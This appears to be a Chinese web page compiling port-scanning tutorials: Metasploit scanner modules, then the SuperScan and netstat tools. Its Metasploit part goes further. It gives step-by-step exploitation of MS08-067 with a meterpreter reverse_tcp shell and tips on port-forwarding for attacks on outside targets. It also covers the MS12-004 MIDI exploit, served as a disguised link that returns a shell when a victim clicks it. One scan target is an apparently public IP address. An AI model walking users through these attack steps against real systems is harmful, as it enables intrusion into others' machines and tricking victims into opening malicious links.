如何用Metasploit扫描端口
一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions
我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的
这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊
MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb
这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数
设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果
直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200
MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下
Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh
在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数
可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置
这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum
设置好目标和线程后run一下就可以
MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置
我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数
将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本
设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多
08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了
MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004
设置下本机ip set SRVHOST ip
然后攻击
会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接
只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell
根据IP如何查看别人开放的所有端口?
1、双击打开电脑上的lansee软件,进入软件页面后点击页面上的工具选项。
2、在弹出的页面中点击页面上的扫描端口选项,并点击弹出页面中的保存选项。
3、在弹出的页面中点击页面上的开始选项即可开始自动扫描端口。
4、扫描完成后即可查看该IP地址下的端口情况。
如何查看IP地址的开放端口情况
两种情况:
对于自己的ip,windows下可以直接使用netstat -na,linux下netstat -ln,查看已开放端口。
对于别人的ip,可以使用各种端口扫描工具,比如xscan等,配置好要扫描的地址和端口范围,直接扫描坐等结果就可以了。
当然开放了端口别人也未必可以连接到,比如有防火墙阻隔,或者针对特定地址打开特定服务等。这些用netstat看的比较清楚。
怎么查看superscan扫描结果
SuperScan直接解压就可以使用,没有安装程序,是一款绿色软件。
功能强大的端口扫描工具。
1)通过Ping来检验IP是否在线;
2)IP和域名相互转换;
3)检验目标计算机提供的服务类别;
4)检验一定范围目标计算机的是否在线和端口情况;
5)工具自定义列表检验目标计算机是否在线和端口情况;
6)自定义要检验的端口,并可以保存为端口列表文件;
7)软件自带一个木马端口列表trojans.lst,通过这个列表可以检测目标计算机是否有木马;同时,也可以自己定义修改这个木马端口列表。
SuperScan界面比较复杂,根据共享功能来使用。
一)域名(主机名)和IP相互转换
这个功能的作用就是取得域名比如:163.com的IP;或者根据IP:202.106.185.77取得域名。
在SuperScan里面,有两种方法来实现此功能:
通过Hostname Lookup来实现在Hostname Lookup的输入框输入需要转换的域名或者IP,按【LookUp】就可以取得结果。如果需要取得自己计算机的IP,可以点击【Me】按钮来取得;同时,也可以取得自己计算机的IP设置情况,点击【InterFaces】取得本地IP设置情况
在Ping的时候,可以根据网络情况在【Timeout】设置相应的反应时间。一般采用默认就可以了,而且,SuperScan速度非常快,结果也很准确,一般没有必要改变反应时间设置。
三)端口检测
端口检测可以取得目标计算机提供的服务,同时,也可以检测目标计算机是否有木马。
(1)检测目标计算机的所有端口
如果检测的时候没有特定的目的,只是为了了解目标计算机的一些情况,可以对目标计算机的所有端口进行检测。
(2)扫描目标计算机的特定端口(自定义端口)
其实,大多数时候我们不需要检测所有端口,只要检测有限的几个端口就可以了,因为的目的只是为了得到目标计算机提供的服务和使用的软件。所以,可以根据个人目的的不同来检测不同的端口,大部分时候,只要检测80(web服务)、21(FTP服务)、23(Telnet服务)就可以了,即使是攻击,也不会有太多的端口检测。
(3)检测目标计算机是否被种植木马
自从BO出现以后,国内最有影响的是冰河木马,然后,出现很多功能类似的木马。针对木马,现在有很多清除工具,除了一般的杀毒软件以外,还可以使用专门清除木马的TheCleaner等软件。如果只是对木马的检测,完全用SuperScan来实现,因为所有木马都必须打开一定的端口,只要检测这些特定的端口就可以知道计算机是否被种植木马。
在主界面选择【Port list setup】,出现端口设置界面,点击【Port list files】的下拉框选择一个叫trojans.lst的端口列表文件,这个文件是软件自带的,提供了常见的木马端口,可以使用这个端口列表来检测目标计算机是否被种植木马。
需要注意的是,木马现在很多,没多久就出现一个,因此,有必要时常注意最新出现的木马和它们使用的端口,随时更新这个木马端口列表。
SuperScan功能强大,但是,在扫描的时候,一定要考虑到网络的承受能力和对目标计算机的影响。同时,无论目的任何,扫描的必须在国家法律法规允许的范围进行。
0条大神的评论